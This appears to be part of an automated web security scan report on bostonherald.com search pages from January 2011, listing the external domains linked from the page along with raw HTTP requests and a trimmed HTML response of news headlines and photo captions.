http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110116/stp/b627cb_jint.jpg
http://multimedia.heraldinteractive.com/images/20110117/stp/0e3e20_brow.jpg
http://multimedia.heraldinteractive.com/images/20110117/stp/13b9ac_jint.jpg
http://multimedia.heraldinteractive.com/images/20110117/stp/ed8979_ltp0e3e20_brow.jpg
http://multimedia.heraldinteractive.com/images/20110118/stp/595066_ltp011711deleoce004.jpg
http://multimedia.heraldinteractive.com/images/20110118/stp/8dc015_Deval_01192011.jpg
http://multimedia.heraldinteractive.com/images/20110118/stp/b37f2d_ltpDeleoB011811.jpg
http://multimedia.heraldinteractive.com/images/20110119/stp/7f1cf0_deval_01192011.jpg
http://multimedia.heraldinteractive.com/images/20110120/stp/3014c4_murray_01212011.jpg
http://multimedia.heraldinteractive.com/images/20110123/stp/c358d0_wiki.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/066488_tunis.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/cdad85_mexi_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/126069_ltpCairoprotest012511.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/777e92_Deval_08012010.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/9162c9_Snow_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/6f4abd_egypt.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/9b9186_clinto.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/cd18d1_012611budgetpw008.jpg
http://multimedia.heraldinteractive.com/images/20110128/de6466_Obama_01292011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/8b9fd5_russia012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Hillary Chabot&type=byline&searchSite=recent&x=10&y=10 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:05:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DHillary&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312654&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8b9fd5_russia012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312548&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312546&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/international/general/view.bg?articleid=1312700&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/international/general/view.bg?articleid=1312700">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312274&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312257&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312257">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/9b9186_clinto.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/us_politics/view.bg?articleid=1312155&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/cd18d1_012611budgetpw008.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312180&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312180">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/9162c9_Snow_01272011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312048&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/777e92_Deval_08012010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312045&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/columnists/view.bg?articleid=1312008&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/6f4abd_egypt.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<a id="trackMainImage_href" href="/news/international/general/view.bg?articleid=1312700">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/de6466_Obama_01292011.jpg" title="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House." alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
title="President Obama tells Mubarak: Must take ‘concrete steps"
onclick="switchPhoto('198235');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198235" src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" title="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
itics/view.bg?articleid=1312665" title="Speaker DeLeo shakes up House"
onclick="switchPhoto('198223');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198223" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
654" title="Mitt Romney ‘catches up’ with Boston GOP pols"
onclick="switchPhoto('198222');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198222" src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" title="Mitt Romney is seen in this April 23, 2009 file photo in Boston."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
12606" title="Dmitry Medvedev signs ratification of nuke pact with US"
onclick="switchPhoto('198177');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198177" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8b9fd5_russia012811.jpg" title="Russian President Dmitry Medvedev gestures as he heads a meeting on economic issues at the Gorki presidential residence outside Moscow on Friday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
2257" title="Gov. Deval Patrick’s ‘painful’ choices"
onclick="switchPhoto('197920');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197920" src="http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg" title="ON THE CHOPPING BLOCK: Gov. Deval Patrick, right, answers questions about his $30.5B budget as Lt. Gov. Tim Murray looks on at the State House."
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1312180" title="Gov. Patrick cuts 900 jobs in bare-bones budget"
onclick="switchPhoto('197875');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197875" src="http://multimedia.heraldinteractive.com/images/20110126/stp/cd18d1_012611budgetpw008.jpg" title="Gov. Deval Patrick responds to questions today at the Statehouse during a press conference on the 2012 budget. "
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
155" title="Hillary Rodham Clinton calls for calm, restraint in Egypt"
onclick="switchPhoto('197855');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197855" src="http://multimedia.heraldinteractive.com/images/20110126/stp/9b9186_clinto.jpg" title="U.S. Secretary of State Hillary Rodham Clinton"
alt="AP (file)" style="margin:0 2px" />
</a>
...[SNIP]...
312048" title="Mother Nature may give state workers another free pass"
onclick="switchPhoto('197745');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197745" src="http://multimedia.heraldinteractive.com/images/20110125/stp/9162c9_Snow_01272011.jpg" title="WINTER BLUES: John Thompson of Burlington snaps a photo of the snow-covered park. "
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
Gov. Deval Patrick bid to combine Parole, Probation agencies rebuffed"
onclick="switchPhoto('197744');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197744" src="http://multimedia.heraldinteractive.com/images/20110125/stp/777e92_Deval_08012010.jpg" title="Gov. Deval Patrick "
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1312008" title="State of the Union rests in Obama’s hands"
onclick="switchPhoto('197748');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197748" src="http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg" title="‘WE WILL MOVE FORWARD TOGETHER’: President Obama gestures while delivering his State of the Union address on Capitol Hill last night."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1311992" title="Officials say 2 killed in new protests in Cairo"
onclick="switchPhoto('197840');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197840" src="http://multimedia.heraldinteractive.com/images/20110126/stp/6f4abd_egypt.jpg" title="Protesters stop traffic in the middle of a bridge over the Nile river during clashes in downtown Cairo, Egypt, in the early hours of Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1311892" title="Egyptian protesters denounce Mubarak; 3 killed"
onclick="switchPhoto('197661');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197661" src="http://multimedia.heraldinteractive.com/images/20110125/stp/126069_ltpCairoprotest012511.jpg" title="Protesters are confronted by riot police as they demonstrate in downtown Cairo, Egypt Tuesday, Jan. 25, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1311847" title="List of 83rd annual Academy Award nominations"
onclick="switchPhoto('197712');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197712" src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" title="Christian Bale and Mark Wahlberg, right, appear in “The Fighter.” The Lowell-based flick was nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
11726" title="Clinton supports Mexico in ’messy’ drug war"
onclick="switchPhoto('197562');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197562" src="http://multimedia.heraldinteractive.com/images/20110124/stp/cdad85_mexi_01252011.jpg" title="Secretary of State Hillary Rodham Clinton speaks to reporters at a press conference in Guanajuato, Mexico."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1311638" title="Tunisian protest tear-gassed, teachers strike"
onclick="switchPhoto('197509');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197509" src="http://multimedia.heraldinteractive.com/images/20110124/stp/066488_tunis.jpg" title="Schoolchildren wait outside their school in Tunis, Monday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311414" title="WikiLeaks: 1 percent of diplomatic docs published"
onclick="switchPhoto('197359');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197359" src="http://multimedia.heraldinteractive.com/images/20110123/stp/c358d0_wiki.jpg" title=" In this Wednesday, Dec. 8, 2010 file photo, Claes Borgstrom, lawyer for the two women who claim to have been sexually assaulted by WikiLeaks founder Julian Assange in Sweden in August, talks to media at his office in Stockholm."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
d=1310972" title="Therese Murray rips gov’s rush to give grants"
onclick="switchPhoto('197040');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197040" src="http://multimedia.heraldinteractive.com/images/20110120/stp/3014c4_murray_01212011.jpg" title="TOUGH TALK: Senate President Therese Murray yesterday criticized Gov. Deval Patrick’s
handling of the grants for Evergreen Solar Inc."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
eneral/view.bg?articleid=1310517" title="Gov to retire double dipping"
onclick="switchPhoto('196803');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196803" src="http://multimedia.heraldinteractive.com/images/20110119/stp/7f1cf0_deval_01192011.jpg" title="RETIREMENT REFORM: Gov. Patrick speaks at a press
conference that outlined his administration’s pension reform and benefits modernization proposal."
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
ws/politics/view.bg?articleid=1310465" title="Evergreen Solar eclipse"
onclick="switchPhoto('196799');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196799" src="http://multimedia.heraldinteractive.com/images/20110118/stp/8dc015_Deval_01192011.jpg" title="FRANK EXCHANGE: Gov. Deval Patrick speaks with Jay Gonzalez, secretary of the Executive Office for Administration and Finance, following a press conference at the State House yesterday that outlined the governor’s pension reform plan."
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
olitics/view.bg?articleid=1310296" title="Speaker plots probation fix"
onclick="switchPhoto('196689');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196689" src="http://multimedia.heraldinteractive.com/images/20110118/stp/595066_ltp011711deleoce004.jpg" title="House Speaker Robert DeLeo "
alt="Christopher Evans" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1310268" title="Evergreen’s flight riles top officials"
onclick="switchPhoto('196734');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196734" src="http://multimedia.heraldinteractive.com/images/20110118/stp/b37f2d_ltpDeleoB011811.jpg" title="LOOKING FOR REFORM: House Speaker Robert DeLeo says the first step in reforming the Probation Department is by putting it under civil-service system rules."
alt="Christopher Evans" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1310258" title="Brown bucks ‘itty-bitty letter’"
onclick="switchPhoto('196662');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196662" src="http://multimedia.heraldinteractive.com/images/20110117/stp/ed8979_ltp0e3e20_brow.jpg" title="Senator Scott Brown speaks yesterday at the 41st Annual Martin Luther King, Jr. Memorial Breakfast at the Boston Convention Center. "
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
0165" title="Obama to honor China’s president with state dinner"
onclick="switchPhoto('196605');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196605" src="http://multimedia.heraldinteractive.com/images/20110117/stp/13b9ac_jint.jpg" title=" In this Nov. 11, 2010, file photo China’s President Hu Jintao waves upon arrival at the Seoul Military Airport to attend the G-20 Summit in Seoul, South Korea."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
" title="Sen. Brown: Forget ‘itty-bitty’ R at end of name"
onclick="switchPhoto('196555');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196555" src="http://multimedia.heraldinteractive.com/images/20110117/stp/0e3e20_brow.jpg" title=" Senator Scott Brown spoke this morning at the 41st Annual Martin Luther King, Jr. Memorial Breakfast at the Boston Convention Center."
alt="Ted Fitzgerald " style="margin:0 2px" />
</a>
...[SNIP]...
leid=1309873" title="US pomp meant to improve tone of China relations"
onclick="switchPhoto('196320');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196320" src="http://multimedia.heraldinteractive.com/images/20110116/stp/b627cb_jint.jpg" title=" In this Jan. 10, 2011 file photo, Chinese President Hu Jintao delivers a speech at a plenary session of the Communist Party of China Central Commission for Discipline Inspection in Beijing. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.296. http://www.bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/search/?topic=Rep.+James+Vallee&srvc=home&position=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DRep.%2BJames%2BVallee%26srvc%3Dhome%26position%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Rep.+James+Vallee&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
